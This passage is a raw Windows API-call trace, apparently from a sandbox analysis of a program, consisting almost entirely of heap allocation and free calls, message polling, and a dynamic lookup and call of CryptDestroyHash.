hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.107] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.154] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.155] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.155] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.155] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.156] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.156] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.156] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.156] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0196.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0196.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0196.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.158] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0196.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0196.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.158] CryptDestroyHash (hHash=0xaa5660) returned 1 [0196.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 